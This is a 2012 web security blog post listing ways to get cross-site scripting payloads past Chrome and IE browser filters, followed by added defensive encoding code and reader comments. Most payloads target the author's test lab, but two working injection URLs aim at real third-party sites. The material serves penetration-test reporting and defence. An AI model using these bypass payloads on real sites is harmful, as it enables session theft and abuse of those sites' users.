runic.pl
Web application security

Bypassing Chrome/IE XSS filters

[16-08-2012]

Sometimes, when writing a report that includes XSS vulnerabilities, you may want to give examples that work not only in Firefox but also get past the browser-side XSS filters in Chrome and IE. Here are some tricks you may use. They do not really bypass the filters; they are simply outside the filters' designed scope.

1. Injection inside <script> tag
(Chrome) http://vuln.testlab.runic.pl/xss.php?g=";alert(document.domain)//
(IE/Chrome) http://vuln.testlab.runic.pl/xss.php?f=)};alert(document.domain);function x() {x(

2. Attribute injection outside of quotes
(Chrome) http://vuln.testlab.runic.pl/xss.php?e=x%20autofocus%20onfocus=alert(document.domain)

3. Multiple injection points
(Chrome) http://vuln.testlab.runic.pl/xss.php?b=*/test='&a=<script>/*&c=';alert(document.domain)</script>

4. DOM-based XSS
(IE/Chrome) http://vuln.testlab.runic.pl/xss.php#<img src=x onerror=alert(0)>

5. Same-origin XSS (sounds strange, doesn’t it?) – IE only
(IE) http://vuln.testlab.runic.pl/xss.php?i=?a=<script>alert(document.domain)</script>
(IE) http://vuln.testlab.runic.pl/xss.php?a=<a href="?a=%26lt;script>alert%26%2340;document.domain)</script>">click me</a>

6. Use any additional decoding/modification performed by application
(IE) http://vuln.testlab.runic.pl/xss.php?h=%253Cscript%253Ealert(0)%253C/script%253E
- in this case, the script applied an unnecessary urldecode() to a parameter the web server had already decoded once.
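All of the cases above share one server-side root cause: untrusted input is placed into an HTML, attribute or JavaScript context without being encoded for that context, and a browser-side filter is at best a second line of defence. The block below is an added example, not code from the original post or from the xss.php test page; every function and parameter name in it is an assumption. It shows context-aware output encoding for the script-string context of cases 1 and 3, the always-quoted attribute of case 2, and the decode-once rule behind case 6, with the double-decoding defect reproduced next to the correct pipeline for comparison.

```javascript
// Added example (not from the original post). Names are assumptions for illustration.

// HTML body/text context: neutralise the characters that can start markup.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Attribute context (case 2): the value is always wrapped in double quotes and
// encoded, so "x autofocus onfocus=..." stays one attribute value instead of
// becoming new attributes.
function htmlAttribute(name, value) {
  return `${name}="${encodeForHtml(value)}"`;
}

// JavaScript string-literal context (cases 1 and 3): every character outside
// [A-Za-z0-9] becomes \uXXXX, so '"' or ';' cannot end the literal and
// "</script>" cannot end the script element.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// The query string is percent-decoded exactly once here, as a web server does
// when it fills $_GET. Everything after this point works on plain text.
function parseQuery(rawQuery) {
  return Object.fromEntries(new URLSearchParams(rawQuery));
}

// Correct pipeline: decode once, then encode for the context being written into.
function renderPage(rawQuery) {
  const q = parseQuery(rawQuery);
  return [
    `<input type="text" ${htmlAttribute('value', q.e ?? '')}>`,
    `<script>var g = "${encodeForJsString(q.g ?? '')}";</script>`,
    `<p>${encodeForHtml(q.h ?? '')}</p>`,
  ].join('\n');
}

// The defect from case 6 reproduced: decoding a second time after the server
// already decoded, and writing the result without encoding. A filter that
// inspects the request sees only "%3C...", never the "<" that reaches the page.
function renderPageDoubleDecode(rawQuery) {
  const q = parseQuery(rawQuery);
  return `<p>${decodeURIComponent(q.h ?? '')}</p>`;
}

// Constructed sample input (not from the post): a double-encoded <b> element.
const SAMPLE_QUERY = 'h=%253Cb%253E&g=%22%3Bx&e=x%22%20y%3Dz';

console.log(renderPage(SAMPLE_QUERY));
console.log(renderPageDoubleDecode(SAMPLE_QUERY));
```

Case 4 is the one this server-side encoding cannot reach: the fragment after `#` is never sent to the server, so the client script that reads `location.hash` has to write it through a text sink such as `textContent` rather than `innerHTML` or `document.write`.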

And here are two random XSS vulnerabilities from xssed.com, modified to work in Chrome:
http://www.mercadolivre.com.br/brasil/ml/l_user.main?as_filtro_id=CERTIFIED_USR&as_nickname=*/x='&as_pcia_id=';alert(document.domain)%3C/script%3E%22%3E%3Cscript%3E/*
http://www.adobe.com/cfusion/tdrc/modal/signin.cfm?loc=en_us&product=';alert(document.domain);x='
(the second one does not execute, but it bypasses the Chrome XSS filter anyway)



Comments

  1. |

    Hey,

    You are alive :)
    A couple of months ago I was testing the Chrome XSS filter and found that in some rare cases it was also possible to smuggle XSS through an incomplete HTML tag – unfortunately it only worked in some really rare cases and it wasn't a real issue.

    c.

  2. |

    Thanks, I didn't know someone still subscribes to my RSS ;)

  3. |

    You know what they say – hope dies last. :P

  4. |

    Just to let you know that the third one, multiple injection points, also works in IE9.

  5. |

    Updated the list, thanks a lot!

  6. |

    For the third one, if I just copy-and-paste it into the IE address bar, it won't work. But it works if I click that link within IE.

    Any comments on why?

  7. |

    Checked again. It seems to work only in the same origin.

  8. |

    Ahh, right, that’s case 5 – now I remember I made the same mistake earlier… :) I’ll update the list again soon. Cheers!

  9. |

    Anyway, it's a great job!
